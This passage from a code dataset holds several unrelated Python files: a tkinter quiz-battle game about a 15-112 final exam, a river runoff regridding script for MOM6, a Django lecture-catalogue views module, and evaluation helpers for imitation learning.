self.spritesDown2 = [ ]\n spriteRow = spritestrip2.crop((0, 0, 256, 64))\n for i in range(4):\n sprite=spriteRow.crop((64*i,0,64*(i+1),64))\n self.spritesDown2.append(sprite)\n ##############\n self.spritesDown = [ ]\n spriteRow = spritestrip.crop((0, 0, 256, 64))\n for i in range(4):\n sprite=spriteRow.crop((64*i,0,64*(i+1),64))\n self.spritesDown.append(sprite)\n 
self.spritesLeft = [ ]\n        spriteRow = spritestrip.crop((0, 64, 256, 128))\n        for i in range(4):\n            sprite=spriteRow.crop((64*i,0,64*(i+1),64))\n            self.spritesLeft.append(sprite)\n        self.spritesRight = [ ]\n        spriteRow = spritestrip.crop((0, 128, 256, 192))\n        for i in range(4):\n            sprite=spriteRow.crop((64*i,0,64*(i+1),64))\n            self.spritesRight.append(sprite)\n        self.spritesUp = [ ]\n        spriteRow = spritestrip.crop((0, 192, 256, 256))\n        for i in range(4):\n            sprite=spriteRow.crop((64*i,0,64*(i+1),64))\n            self.spritesUp.append(sprite)\n        self.down=True\n        self.up=False\n        self.left=False\n        self.right=False\n        self.spriteCounter = 0\n        self.speech=False\n        self.inBattleMode()\n\n    def inBattleMode(self):\n        self.inBattle=True\n        self.kosInitMessage=False\n        self.battleEnterCount=0\n        self.attackChoice=False\n        self.kickOut=False\n        self.passed=False\n        self.profHealth=0\n        self.TAHealth=self.app.classRoomMode.TAHealth\n        self.TAwin=False\n        self.TAlose=False\n        self.codeBattle()\n        self.testCount=0\n\n    def codeBattle(self):\n        self.codeBattleMode=False\n        self.question1=True\n        self.question2=False\n        self.question3=False\n        self.question1Ans1=0\n        self.question1Ans2=2\n        self.question2Ans1=0\n        self.question2Ans2=1\n        self.question3Ans1=0\n        self.question3Ans2=1\n        self.ansBox1=[False,False,False]\n        self.ansBox2=[False,False,False]\n        self.ansPos1=[(self.width/5+17,60+87),(self.width/5+17,60+127),(self.width/5+17,60+167)]\n        self.ansPos2=[(self.width/5+17,60+210+87),(self.width/5+17,60+210+127),(self.width/5+17,60+210+167)]\n\n\n    def dist(self,x0,y0,x1,y1):\n        return (((x1-x0)**2+(y1-y0)**2)**.5)\n\n    def keyPressed(self,event):\n        if (event.key==\"Up\"):\n            self.up=True\n            self.left=False\n            self.right=False\n            self.down=False\n            self.y-=5\n            self.spriteCounter = (self.spriteCounter+1)%(len(self.spritesUp))\n        elif (event.key==\"Down\"):\n            self.up=False\n            self.left=False\n            self.right=False\n            self.down=True\n            self.y+=5\n            self.spriteCounter = (self.spriteCounter+1)%(len(self.spritesDown))\n        elif (event.key==\"Right\"):\n            self.up=False\n            self.left=False\n            self.right=True\n            self.down=False\n            self.x+=5\n            self.spriteCounter = (self.spriteCounter+1)%(len(self.spritesRight))\n        elif (event.key==\"Left\"):\n            self.up=False\n            self.left=True\n            self.right=False\n            self.down=False\n            self.x-=5\n            self.spriteCounter = (self.spriteCounter+1)%(len(self.spritesLeft))\n        elif (event.key==\"Enter\"):\n            self.speech=not self.speech\n        #Battle\n        elif (event.key==\"1\"):\n            self.inBattle=True\n        if self.inBattle:\n            if (event.key==\"Enter\" and self.battleEnterCount==0):\n                self.kosInitMessage=True\n                self.battleEnterCount+=1\n            elif (event.key==\"Enter\" and self.battleEnterCount==1):\n                self.attackChoice=True\n                self.battleEnterCount+=1\n            elif (self.attackChoice):\n                if event.key==\"a\":\n                    self.TAHealth+=1\n                    if (self.TAHealth>=3):\n                        self.TAlose=True\n                elif event.key==\"f\":\n                    self.codeBattleMode=True\n                    if (self.profHealth>=3):\n                        self.TAwin=True\n                elif event.key==\"r\":\n                    self.inBattle=False\n            elif (event.key==\"r\" and (self.TAlose or self.TAwin)):\n                self.appStarted()\n        count=0\n        if (self.codeBattleMode and event.key==\"Enter\"):\n            if (self.TAHealth>=3):\n                self.TAlose=True\n            if (self.profHealth>=3):\n                self.TAwin=True\n            anspos1=0\n            anspos2=0\n            for i in range (len(self.ansBox1)):\n                if self.ansBox1[i]==True:\n                    anspos1=i\n            for j in range (len(self.ansBox2)):\n                if self.ansBox2[j]==True:\n                    anspos2=j\n            if (self.question1):\n                if self.checkForCorrect(anspos1,self.question1Ans1):\n                    count+=1\n                if self.checkForCorrect(anspos2,self.question1Ans2):\n                    count+=1\n            elif (self.question2):\n                if 
self.checkForCorrect(anspos1,self.question2Ans1):\n count+=1\n if self.checkForCorrect(anspos2,self.question2Ans2):\n count+=1\n elif (self.question3):\n if self.checkForCorrect(anspos1,self.question3Ans1):\n count+=1\n if self.checkForCorrect(anspos2,self.question3Ans2):\n count+=1\n if count>=2:\n self.profHealth+=1\n elif count==1:\n self.TAHealth+=1\n self.codeBattle()\n self.testCount=(self.testCount+1)%3\n if (self.testCount==0):\n self.question1=True\n self.question2=False\n self.question3=False\n elif (self.testCount==1):\n self.question1=False\n self.question2=True\n self.question3=False\n elif (self.testCount==2):\n self.question1=False\n self.question2=False\n self.question3=True\n\n def checkForCorrect(self,ansPos,givenAnsPos):\n if ansPos==givenAnsPos:\n return True\n return False\n\n def mousePressed(self,event):\n for i in range(len(self.ansPos1)):\n x,y = self.ansPos1[i]\n if self.dist(event.x, event.y, x, y) <= 7:\n self.ansBox1[i] = True\n self.ansBox1[(i+1)%3] = False\n self.ansBox1[(i-1)%3] = False\n for i in range(len(self.ansPos2)):\n x,y = self.ansPos2[i]\n if self.dist(event.x, event.y, x, y) <= 7:\n self.ansBox2[i] = True\n self.ansBox2[(i+1)%3] = False\n self.ansBox2[(i-1)%3] = False\n\n def madeMove(self, move):\n self.attackChoice=False\n if move==\"argue\":\n self.kickOut=True\n elif move==\"smile\":\n self.passed=True\n\n def timerFired(self):\n if (self.testCount==0):\n self.question1=True\n self.question2=False\n self.question3=False\n elif (self.testCount==1):\n self.question1=False\n self.question2=True\n self.question3=False\n elif (self.testCount==2):\n self.question1=False\n self.question2=False\n self.question3=True\n \n def drawSpeech(self, canvas, text):\n canvas.create_rectangle(40,315,510,460,fill=\"white\")\n canvas.create_image(self.width/2, self.height, anchor=\"s\",\n image=ImageTk.PhotoImage(self.imageText))\n \n canvas.create_text(self.width/2, self.height-90,\n text=text,\n font=\"Courier 16\")\n \n def drawBattleground(self,canvas):\n canvas.create_image(self.width/2, self.height/2,\n image=ImageTk.PhotoImage(self.battleground))\n p1=self.scaleImage(self.spritesUp[2], 2.5)\n canvas.create_image(self.width/3, 4.3*self.height/8,\n image=ImageTk.PhotoImage(p1))\n TAHealth=self.healthbars[self.TAHealth]\n health=self.scaleImage(TAHealth, .4)\n canvas.create_image(self.width/3, 4.3*self.height/8-50, image=ImageTk.PhotoImage(health))\n\n p2=self.scaleImage(self.spritesDown2[2], 1.7)\n canvas.create_image(1.7*self.width/3, 1.4*self.height/4,\n image=ImageTk.PhotoImage(p2))\n profHealth=self.healthbars[self.profHealth]\n health=self.scaleImage(profHealth, .6)\n canvas.create_image(1.7*self.width/3, 1.4*self.height/4-60,image=ImageTk.PhotoImage(health))\n self.drawSpeech(canvas,\n \"You are now facing the final boss...\\nProfessor Kosbae\")\n\n def drawWinScreen(self,canvas):\n canvas.create_text(self.width/2,self.height/2,text=\"TA Wins\",font=\"Courier 30\")\n ta=self.scaleImage(self.spritesDown[2], 2.5)\n canvas.create_image(self.width/5, self.height/2,\n image=ImageTk.PhotoImage(ta))\n trop=self.scaleImage(self.winIcon, .2)\n canvas.create_image(self.width/5, self.height/2+150,\n image=ImageTk.PhotoImage(trop))\n prof=self.scaleImage(self.spritesDown2[2], 2.5)\n canvas.create_image(4*self.width/5, self.height/2,\n image=ImageTk.PhotoImage(prof))\n death=self.scaleImage(self.deathIcon, .6)\n canvas.create_image(4*self.width/5, self.height/2,\n image=ImageTk.PhotoImage(death))\n\n def drawLoseScreen(self, canvas):\n 
canvas.create_text(self.width/2,self.height/2,text=\"TA Loses\",font=\"Courier 30\")\n ta=self.scaleImage(self.spritesDown[2], 2.5)\n canvas.create_image(self.width/5, self.height/2,\n image=ImageTk.PhotoImage(ta))\n death=self.scaleImage(self.deathIcon, .6)\n canvas.create_image(self.width/5, self.height/2,\n image=ImageTk.PhotoImage(death))\n prof=self.scaleImage(self.spritesDown2[2], 2.5)\n canvas.create_image(4*self.width/5, self.height/2,\n image=ImageTk.PhotoImage(prof))\n trop=self.scaleImage(self.winIcon, .2)\n canvas.create_image(4*self.width/5, 2*self.height/3+50,\n image=ImageTk.PhotoImage(trop))\n canvas.create_text(self.width/2,2*self.height/3,text=\"Press r to restart\",font=\"Courier 20\")\n\n def drawCodeBattle(self,canvas):\n desk=self.scaleImage(self.deskImg, 1.2)\n canvas.create_image(self.width/2,self.height/2,image=ImageTk.PhotoImage(desk))\n canvas.create_rectangle(self.width/5,20,self.width*4/5,self.height-20,fill=\"white\")\n if (self.question1):\n canvas.create_text(self.width/2,40,text=\"Final Exam Part 1\", font=\"Courier 16\")\n self.drawQuestion(canvas,\"1\",\"\"\"def checkForWin(board, player):\n \\n winningWord = player * 4\n \\n return _____\"\"\",\n \n \"(wordSearch(board, winningWord) != None)\",\"(wordSearch(board, winningWord) = None)\",\"(wordSearchFromCell(board, winningWord)\",\n self.ansBox1)\n self.drawQuestion(canvas,\"2\",\"\"\"What is the big O of this function?\\n\\nL.sort()\"\"\",\n \n \"O(N)\",\"O(logN)\",\"O(NlogN)\",\n self.ansBox2)\n elif (self.question2):\n canvas.create_text(self.width/2,40,text=\"Final Exam Part 2\", font=\"Courier 16\")\n self.drawQuestion(canvas,\"1\",\"\"\"def distance(x1, y1, x2, y2):\n \\n return (_______ + (y2 - y1)**2)**0.5\"\"\",\n \n \"(x2 - x1)**2\",\"(y2 + y1)**2\",\"Ans 3\",self.ansBox1)\n self.drawQuestion(canvas,\"2\",\"\"\"Given the list L=[3,None,False], \\n\\nwhich of the following functions \\n\\n crashes?\"\"\",\n \n \n \"min(L)\",\"L.pop(-2)\",\"L[Carpe Diem]+1\",self.ansBox2)\n elif (self.question3):\n canvas.create_text(self.width/2,40,text=\"Final Exam Part 3\", font=\"Courier 16\")\n self.drawQuestion(canvas,\"1\",\"\"\"How do you access the number of \n \\n columns in the 2D List L?\"\"\",\n \n \"len(L[0)]\",\"set(len(L[5])\",\":/\",self.ansBox1)\n self.drawQuestion(canvas,\"2\",\"\"\"What type of animal is Professor\n \\n Taylor's pet?\"\"\",\n \n \"pig\",\"axolotl\",\"dragon\",self.ansBox2)\n\n def drawQuestion(self, canvas, num, question,a1,a2,a3,ansBox):\n color=[]\n r=7\n for boo in ansBox:\n if boo==False:\n color.append(\"white\")\n else:\n color.append(\"green\")\n canvas.create_oval(self.width/5+17-r,60+210*(int(num)-1)+87-r,self.width/5+17+r,60+210*(int(num)-1)+87+r,fill=color[0])\n canvas.create_oval(self.width/5+17-r,60+210*(int(num)-1)+127-r,self.width/5+17+r,60+210*(int(num)-1)+127+r,fill=color[1])\n canvas.create_oval(self.width/5+17-r,60+210*(int(num)-1)+167-r,self.width/5+17+r,60+210*(int(num)-1)+167+r,fill=color[2])\n canvas.create_text(self.width/5+10,60+210*(int(num)-1), anchor=\"nw\",text=num+\".) 
\"+ question,font=\"Courier 13\")\n canvas.create_text(self.width/5+35,60+210*(int(num)-1)+80, anchor=\"nw\",text=a1,font=\"Courier 12\")\n canvas.create_text(self.width/5+35,60+210*(int(num)-1)+120, anchor=\"nw\",text=a2,font=\"Courier 12\")\n canvas.create_text(self.width/5+35,60+210*(int(num)-1)+160, anchor=\"nw\",text=a3,font=\"Courier 12\")\n \n \n def redrawAll(self, canvas):\n if not (self.TAlose or self.TAwin):\n if self.inBattle:\n self.drawBattleground(canvas)\n if (self.kosInitMessage and self.battleEnterCount==1):\n text=\"Prof Kosbae: Welcome to the Final Exam ...\\nwhats your first move?\"\n self.drawSpeech(canvas, text)\n elif (self.attackChoice):\n self.drawSpeech(canvas, \"\"\"What is your move?:\n \\n- Argue (a)\\n- Start the test (f)\\n- Run (r)\"\"\")\n if (self.codeBattleMode):\n self.drawCodeBattle(canvas)\n elif (self.kickOut):\n self.drawSpeech(canvas, \"\"\"You have been kicked out from 15-112,\n \\n try harder next time\"\"\")\n elif (self.passed):\n self.drawSpeech(canvas, \"\"\"You have now passed 15-112!\"\"\")\n else:\n if self.up:\n sprite=self.spritesUp[self.spriteCounter]\n elif self.down:\n sprite=self.spritesDown[self.spriteCounter]\n elif self.right:\n sprite=self.spritesRight[self.spriteCounter]\n elif self.left:\n sprite=self.spritesLeft[self.spriteCounter]\n canvas.create_image(self.x, self.y, image=ImageTk.PhotoImage(sprite))\n TAHealth=self.healthbars[self.TAHealth]\n health=self.scaleImage(TAHealth, .2)\n canvas.create_image(self.x, self.y-20, image=ImageTk.PhotoImage(health))\n if (self.speech):\n self.drawSpeech(canvas,\"Hi, my name is TA\")\n elif(self.TAwin):\n self.drawWinScreen(canvas)\n elif(self.TAlose):\n self.drawLoseScreen(canvas)\n\n\nDerekApp(width=544, height=480)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":17500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"549899996","text":"import numpy as np\nimport os\ntry:\n import netCDF4 as netCDF\nexcept:\n import netCDF3 as netCDF\nimport matplotlib.pyplot as plt\nimport time\nimport datetime\nfrom matplotlib.dates import date2num, num2date\n\nimport pyroms\nimport pyroms_toolbox\nfrom pyroms import _remapping\nimport xarray as xr\n\nclass nctime(object):\n pass\n\ndef remap_river(src_file, src_varname, dst_grd, dst_mask, dst_dir='./'):\n\n ocn_lon = xr.open_dataset(dst_grd).x[1::2,1::2] # Cell-center longitudes (cell centers)\n ocn_lat = xr.open_dataset(dst_grd).y[1::2,1::2] # Cell-center latitudes (cell centers)\n lon_b = xr.open_dataset(dst_grd).x[::2,::2] # Corner longitudes\n lat_b = xr.open_dataset(dst_grd).y[::2,::2] # Corner latitudes\n coords = xr.Dataset({\"lon\": ocn_lon, \"lat\": ocn_lat})\n coords2 = xr.Dataset({\"lon_b\": lon_b, \"lat_b\": lat_b })\n coords = coords.rename({'nyp': 'ny', 'nxp': 'nx'})\n coords = coords.merge(coords2)\n\n dx = xr.open_dataset(dst_grd).dx[1::2,::2] + xr.open_dataset(dst_grd).dx[1::2,1::2]\n dy = xr.open_dataset(dst_grd).dy[::2,1::2] + xr.open_dataset(dst_grd).dy[1::2,1::2]\n area_dst = dx.data * dy.data\n mask_rho = xr.open_dataset(dst_mask).mask\n\n # get time\n nctime.long_name = 'time'\n nctime.units = 'days since 1900-01-01 00:00:00'\n time0 = datetime.date(1900, 1, 1)\n\n # create runoff file\n dst_file = src_file.rsplit('/')[-1]\n dst_file = dst_dir + dst_file[:-3] + '_' + src_varname + '_Hill_NGOA.nc'\n print('\\nCreating file', dst_file)\n if os.path.exists(dst_file) is True:\n os.remove(dst_file)\n\n # open River file\n nc = 
netCDF.Dataset(dst_file, 'w', format='NETCDF4')\n nc.Author = 'pyroms_toolbox.nc_create_roms_file'\n nc.Created = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n nc.title = 'MOM6 runoff file'\n\n Mp, Lp = (lon_b.shape)\n nc.createDimension('IQ', Lp)\n nc.createDimension('JQ', Mp)\n nc.createDimension('i', Lp-1)\n nc.createDimension('j', Mp-1)\n nc.createDimension('time', None)\n\n #load var\n cf = xr.open_dataset(src_file)\n years = cf.year.data\n months = cf.month.data\n days = cf.day.data\n src_lon = cf.lon.data + 360.0\n src_lat = cf.lat.data\n\n src_var_all = cf.q.data\n\n #get missing value\n spval = 1.e30\n\n# dst_varname = 'Runoff_raw'\n# dimensions = ('time', 'j', 'i')\n# long_name = 'river discharge'\n# units = 'meter^3/sec'\n\n # create variable in file\n nc.createVariable('time', 'f8', ('time'))\n nc.variables['time'].units = 'days since 1900-01-01'\n nc.variables['time'].calendar = 'gregorian'\n# print('Creating variable', dst_varname)\n# nc.createVariable(dst_varname, 'f8', dimensions, fill_value=spval)\n# nc.variables[dst_varname].long_name = long_name\n# nc.variables[dst_varname].units = 'm^3/day'\n\n nc.createVariable('Runoff', 'f8', ('time', 'j', 'i'), fill_value=spval)\n nc.variables['Runoff'].long_name = 'Hill River Runoff'\n nc.variables['Runoff'].units = 'kg/m^2/sec'\n\n # get littoral (here just 1 cell wide, with diagonals)\n width = 1\n idx = []\n idy = []\n maskl = mask_rho.copy()\n for w in range(width):\n lit = pyroms_toolbox.get_littoral(maskl)\n idx.extend(lit[0])\n idy.extend(lit[1])\n maskl[lit] = 0\n\n littoral_idx = (np.array(idx), np.array(idy))\n\n ntimes = len(years)\n for it in range(ntimes):\n src_var = src_var_all[it,:]/86400.0\n net_flow = np.sum(src_var)\n src_var = xr.DataArray(src_var)\n src_var = src_var.fillna(0)\n src_var = src_var.data\n print(src_var.shape)\n\n time = datetime.date(years[it], months[it], days[it])\n print('time =', time)\n\n # horizontal interpolation\n print('horizontal interpolation using brute force')\n\n\n # write data in destination file\n print('write data in destination file')\n nc.variables['time'][it] = (time - time0).days\n\n runoff = pyroms_toolbox.remap_river(src_var, src_lon, src_lat, \\\n np.array(littoral_idx).T + 1, \\\n ocn_lon, ocn_lat)\n net_flow2 = np.sum(runoff)\n print(\"flow before\", net_flow)\n print(\"regridded flow\", net_flow2)\n\n # Runoff_raw for debugging\n# nc.variables[dst_varname][it] = runoff\n## zero out contribution from outside the domain\n runoff[0,:] = 0\n runoff[:,-1] = 0\n net_flow3 = np.sum(runoff)\n print(\"final flow\", net_flow3)\n runoff = runoff * 1000.0 / area_dst # convert units\n nc.variables['Runoff'][it] = runoff\n\n # close destination file\n nc.close()\n\n","sub_path":"examples/Hill_runoff/old_MOM6/remap_river.py","file_name":"remap_river.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"297286169","text":"from django.utils import timezone\nfrom .models import Lection, Author, Theme, User_reg\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom django.http import JsonResponse, HttpResponse\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom .forms import AuthorForm, LectionForm \nfrom .serializers import LectionSerializer, ALectionSerializer, AuthorSerializer, LAuthorSerializer\nfrom django.contrib.auth.decorators import 
login_required \nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User \nfrom rest_framework.authentication import BasicAuthentication, TokenAuthentication\nfrom rest_framework.authtoken.models import Token\nfrom functools import wraps\n\n\ndef json_meta(message,serializerData):\n data = {\n 'meta':{\n 'status': 'success',\n 'count': 1,\n 'total_count': 1,\n 'notice': message\n },\n 'data': serializerData\n }\n return data \n\ndef json_meta_list(amount,order,serializerData):\n data = {\n 'meta':{\n 'status': 'success',\n 'count': 1,\n 'total_count': 1,\n 'amount': amount,\n 'filter': order,\n 'notice': ''\n },\n 'data': serializerData\n }\n return data \n\ndef json_meta_del(message):\n data = {\n 'meta':{\n 'status': 'success',\n 'count': 1,\n 'total_count': 1,\n 'notice': message\n }\n }\n return data \n\ndef check_token(view_func):\n def _decorator(request, *args, **kwargs):\n if request.META.has_key('HTTP_AUTHORIZATION'):\n if request.META['HTTP_AUTHORIZATION'].split()[0] != 'Token':\n return None\n key = request.META['HTTP_AUTHORIZATION'].split()[1]\n user = Token.objects.get(key=key).user\n if user:\n request.user = user \n response = view_func(request, *args, **kwargs)\n \n if request.META.has_key('HTTP_AUTHORIZATION'):\n request.user = None \n return response\n return wraps(view_func)(_decorator) \n\n\n\ndef lection_list(request):\n amount = request.GET.get('amount', 5)\n page = request.GET.get('page')\n order = request.GET.get('filter', 'new')\n if order == 'old':\n lectures = Lection.objects.filter(created_date__lte=timezone.now()).order_by('created_date')\n else:\n lectures = Lection.objects.filter(created_date__lte=timezone.now()).order_by('-created_date')\n p = Paginator(lectures, amount)\n try:\n lectures = p.page(page)\n except PageNotAnInteger:\n lectures = p.page(1) \n except EmptyPage:\n lectures = p.page(p.num_pages) \n if request.META['HTTP_ACCEPT'] == \"application/json\":\n json_obj = []\n for lect in lectures: \n json_obj.append(lect.as_json()) \n lections = LectionSerializer(lectures, many=True).data\n wrap = json_meta_list(amount, order, lections) \n return JsonResponse(wrap,safe=False)\n else:\n return render(request, 'lections/lection_list.html', {'lectures':lectures, 'amount':amount})\n\ndef detail(request, pk):\n lection = get_object_or_404(Lection, pk=pk)\n if request.user.is_authenticated():\n user = User_reg.objects.get(id=request.user.id)\n if request.method == 'GET':\n count = len(User_reg.objects.filter(favorit__pk=lection.pk))\n if request.user.is_authenticated():\n is_favorit = Lection.objects.filter(pk=pk,user_reg__id=user.id)\n if request.META['HTTP_ACCEPT'] == \"application/json\":\n lect = LectionSerializer(lection).data\n wrap = json_meta('',lect)\n return JsonResponse(wrap, safe=False)\n elif request.user.is_authenticated():\n return render(request, 'lections/detail.html', {'lection':lection, 'count':count, 'is_favorit':is_favorit})\n else:\n return render(request, 'lections/detail.html', {'lection':lection, 'count':count})\n elif request.method == 'DELETE': \n lection.delete()\n if request.META['HTTP_ACCEPT'] == \"application/json\":\n wrap = json_meta_del('Lecture successfully deleted')\n return JsonResponse(wrap) \n else:\n return HttpResponse('Successfully deleted') \n\n@check_token\n@login_required\ndef new_lect(request):\n if request.method == 'POST':\n form = LectionForm(request.POST)\n if form.is_valid():\n lection = form.save()\n lection.created_date = timezone.now()\n lection.save()\n if 
request.META['HTTP_ACCEPT'] == \"application/json\":\n lect = LectionSerializer(lection).data\n wrap = json_meta('Lecture was successfully created',lect)\n return JsonResponse(wrap, safe=False)\n else:\n return redirect('lections.views.detail', pk=lection.pk)\n else:\n form = LectionForm()\n return render(request, 'lections/new_lect.html', {'form': form}) \n\n@check_token\n@login_required\ndef edit_lect(request,pk):\n lection = get_object_or_404(Lection, pk=pk)\n if request.method == 'PUT':\n form = LectionForm(request.PUT, instance=lection)\n if form.is_valid():\n lection = form.save()\n lection.created_date = timezone.now()\n lection.save()\n if request.META['HTTP_ACCEPT'] == \"application/json\":\n lect = LectionSerializer(lection).data\n wrap = json_meta('Lecture was successfully updated',lect)\n return JsonResponse(wrap, safe=False)\n else:\n return render(request, 'lections/detail.html', {'lection':lection})\n elif request.method == 'POST':\n form = LectionForm(request.POST, instance=lection)\n if form.is_valid():\n lection = form.save()\n lection.created_date = timezone.now()\n lection.save()\n return redirect('lections.views.detail', pk=lection.pk)\n else:\n form = LectionForm(instance=lection)\n return render(request, 'lections/new_lect.html', {'form': form}) \n\n@check_token\n@login_required\ndef del_lect(request,pk):\n if request.user.is_superuser == True:\n lection = get_object_or_404(Lection, pk=pk)\n lection.delete()\n return redirect('lections.views.lection_list') \n else:\n return redirect('/login') \n \n\ndef authors(request, pk): \n lection = get_object_or_404(Lection, pk=pk)\n if request.method == 'GET': \n authors = lection.authors.all() \n if request.META['HTTP_ACCEPT'] == \"application/json\":\n json_obj = []\n for aut in authors:\n json_obj.append(aut.as_json())\n auth = LAuthorSerializer(authors, many=True).data\n wrap = json_meta('',auth)\n return JsonResponse(wrap, safe=False) \n else:\n return render(request, 'lections/authors.html', {'authors':authors}) \n if request.method == 'PUT': \n author_ids = []\n author_ids = request.PUT.getlist(\"author_ids[]\")\n not_author_ids = []\n not_author_ids = request.PUT.getlist(\"not_author_ids[]\")\n for aut in author_ids:\n a1 = Author.objects.get(id=aut)\n lection.authors.add(a1) \n for naut in not_author_ids:\n a2 = Author.objects.get(id=naut)\n lection.authors.remove(a2) \n authors = lection.authors.all() \n if request.META['HTTP_ACCEPT'] == \"application/json\":\n json_obj = []\n for aut in authors:\n json_obj.append(aut.as_json())\n auth = LAuthorSerializer(authors, many=True).data\n wrap = json_meta('',auth)\n return JsonResponse(wrap, safe=False) \n else:\n return render(request, 'lections/authors.html', {'authors':authors}) \n\ndef authors_list(request):\n authors = Author.objects.order_by('first_name')\n if request.META['HTTP_ACCEPT'] == \"application/json\":\n json_obj = []\n for aut in authors:\n json_obj.append(aut.as_json())\n auth = LAuthorSerializer(authors, many=True).data\n wrap = json_meta('',auth)\n return JsonResponse(wrap, safe=False) \n else:\n return render(request, 'lections/authors_list.html', {'authors':authors})\n\ndef authors_detail(request, pk): \n author = get_object_or_404(Author, pk=pk) \n lections = author.lection_set.all() \n if request.META['HTTP_ACCEPT'] == \"application/json\":\n auth = AuthorSerializer(author).data\n wrap = json_meta('',auth)\n return JsonResponse(wrap, safe=False) \n else:\n return render(request, 'lections/authors_detail.html', 
{'author':author})\n\n@check_token\n@login_required\ndef new_auth(request):\n    if request.method == 'POST':\n        form = AuthorForm(request.POST)\n        if form.is_valid():\n            author = form.save(commit=False)\n            author.save()\n            if request.META['HTTP_ACCEPT'] == \"application/json\":\n                auth = LAuthorSerializer(author).data\n                wrap = json_meta('New author was successfully created',auth)\n                return JsonResponse(wrap, safe=False) \n            else: \n                return redirect('lections.views.authors_list')\n    else: \n        form = AuthorForm()\n    return render(request, 'lections/new_auth.html', {'form': form}) \n\n\n@check_token\n@login_required\ndef add_to_fav(request, pk): \n    lection = get_object_or_404(Lection, pk=pk)\n    user = User_reg.objects.get(id=request.user.id)\n    user.favorit.add(lection)\n    return redirect('lections.views.detail', pk=lection.pk) \n\n@check_token\n@login_required\ndef remove_from_fav(request, pk): \n    lection = get_object_or_404(Lection, pk=pk)\n    user = User_reg.objects.get(id=request.user.id)\n    user.favorit.remove(lection)\n    return redirect('lections.views.detail', pk=lection.pk) \n\n\n","sub_path":"lections/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"578104542","text":"import numpy as np\nimport scipy.stats\nimport random\nimport IPython\nfrom sklearn.metrics import hinge_loss\n\ndef F2(env, pi1, pi2, sup, T, num_samples=1):\n    losses = []\n    for i in range(num_samples):\n        # collect trajectory with states visited and actions taken by agent\n        tmp_states, _, _, _, _ = collect_traj(env, pi1, T)\n        tmp_actions = np.array([pi2.intended_action(s) for s in tmp_states])\n        tmp_scores = np.array([pi2.decision_function(s) for s in tmp_states])\n        sup_actions = np.array([sup.intended_action(s) for s in tmp_states])\n        n = len(sup_actions)\n\n\n        hinge = hinge_loss(sup_actions, tmp_scores)\n        penalty = pi2.est.alpha * .5 * np.square(np.linalg.norm(pi2.est.coef_))\n        print(\"hinge: \" + str(hinge))\n        print(\"penalty: \" + str(penalty))\n        errors = hinge / n + penalty\n\n        # compute the mean error on that trajectory (may not be T samples since game ends early on failures)\n        losses.append(np.mean(errors))\n\n    # compute the mean and sem on averaged losses.\n    return stats(losses)\n\ndef F(env, pi1, pi2, sup, T, num_samples=1):\n    losses = []\n    for i in range(num_samples):\n        # collect trajectory with states visited and actions taken by agent\n        tmp_states, _, _, _, _ = collect_traj(env, pi1, T)\n        tmp_actions = np.array([pi2.intended_action(s) for s in tmp_states])\n        sup_actions = np.array([sup.intended_action(s) for s in tmp_states])\n        errors = 1.0 - np.mean(sup_actions == tmp_actions)\n        # compute the mean error on that trajectory (may not be T samples since game ends early on failures)\n        losses.append(np.mean(errors))\n\n    # compute the mean and sem on averaged losses.\n    return stats(losses)\n\ndef eval_agent_statistics_discrete(env, lnr, sup, T, num_samples=1):\n    \"\"\"\n    evaluate loss in the given environment along the agent's distribution\n    for T timesteps on num_samples\n    \"\"\"\n    losses = []\n    for i in range(num_samples):\n        # collect trajectory with states visited and actions taken by agent\n        tmp_states, _, tmp_actions, _, _ = collect_traj(env, lnr, T)\n        sup_actions = np.array([sup.intended_action(s) for s in tmp_states])\n        errors = 1.0 - np.mean(sup_actions == tmp_actions)\n        # compute the mean error on that trajectory (may not be T samples since game ends early on failures)\n        losses.append(np.mean(errors))\n\n    # compute the mean and sem on averaged losses.\n    return stats(losses)\n\ndef stats(losses):\n    if len(losses) == 1: sem = 0.0\n    else: sem = scipy.stats.sem(losses)\n\n    d = {\n        'mean': np.mean(losses),\n        'sem': sem\n    }\n    return d\n\ndef ste(trial_rewards):\n    if trial_rewards.shape[0] == 1:\n        return np.zeros(trial_rewards.shape[1])\n    return scipy.stats.sem(trial_rewards, axis=0)\n\ndef mean(trial_rewards):\n    return np.mean(trial_rewards, axis=0)\n\n\ndef mean_sem(trial_data):\n    s = ste(trial_data)\n    m = mean(trial_data)\n    return m, s\n\n\ndef evaluate_lnr_discrete(env, lnr, sup, T):\n    stats = eval_agent_statistics_discrete(env, lnr, sup, T, 1)\n    return stats['mean']\n\n\ndef collect_traj(env, agent, T, visualize=False):\n    \"\"\"\n    agent must have methods: sample_action and intended_action\n    Run trajectory on sampled actions\n    record states, intended actions, taken actions, total reward and per-step infos\n    \"\"\"\n    states = []\n    intended_actions = []\n    taken_actions = []\n    infos = []\n\n    # take one no-op step so the agent has an initial state and info to act on\n    env.reset()\n    action = [0, 0]\n    s, r, done, info = env.step(action)\n\n    reward = 0.0\n\n\n    for t in range(T):\n\n        a_intended = agent.intended_action(s, info)\n        a = agent.sample_action(s, info)\n        next_s, r, done, next_info = env.step(a)\n        reward += r\n\n        states.append(s)\n        infos.append(info)\n        intended_actions.append(a_intended)\n        taken_actions.append(a)\n\n        s = next_s\n        info = next_info\n\n        if visualize:\n            env.render()\n\n        if done:\n            break\n\n\n    return states, intended_actions, taken_actions, reward, infos\n","sub_path":"tools/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"401143637","text":"\"\"\" Utility functions and classes for SRP\n\nContext : SRP\nModule  : Fits.py\nVersion : 1.2.2\nAuthor  : Stefano Covino\nDate    : 18/05/2017\nE-mail  : stefano.covino@brera.inaf.it\nURL:    : http://www.merate.mi.astro.it/utenti/covino\n\nUsage   : 